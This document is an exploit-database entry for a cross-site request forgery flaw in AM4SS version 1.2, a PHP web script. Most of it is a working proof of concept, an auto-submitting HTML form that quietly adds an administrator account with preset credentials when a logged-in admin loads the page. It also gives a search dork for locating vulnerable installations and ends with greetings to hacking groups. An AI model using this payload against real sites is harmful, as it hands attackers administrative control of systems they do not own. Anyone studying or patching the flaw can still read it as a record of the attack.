AM4SS 1.2 CSRF add admin Vulnerability

2011-09-07T00:00:00
ID 1337DAY-ID-16913
Type zdt
Reporter red virus
Modified 2011-09-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #Title    :  AM4SS Version 1.2  - CSRF add Admin
#Script   :  AM4SS Version 1.2
#Language : Php
#Download : http://am4ss.org/am4ss.tar.gz                
#Date     : 2011/09/09
#Version  : 1.2
#Dork     : "Powered by AM4SS "
#Found    : by red virus >>> [email protected]
#Homepage : www.alm3refh.com
  
  
  
<html>
<form  name="r3dvirus" action="http://localhost/am4ss/admincp/users.php?do=add" method="post">
<input value="egypt"  name="userfullname" type="text" />                                 
<input value="123456"   name="password" type="text" />                                   
<input value="[email protected]"  name="useremail" type="text" />                         
<input value="EG"  name="country" type="text" />
<input value="3"  name="usergroup" type="text" />
<input value="save"  name="do" type="text" />                                                            
</form>
<script>document.r3dvirus.submit();</script>
</html>
 
###########################################################################################################
greats 2
 >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3 & orange man
infofst & virus hima & Karar aLShaMi & b0x & all alm3refh group



#  0day.today [2018-02-17]  #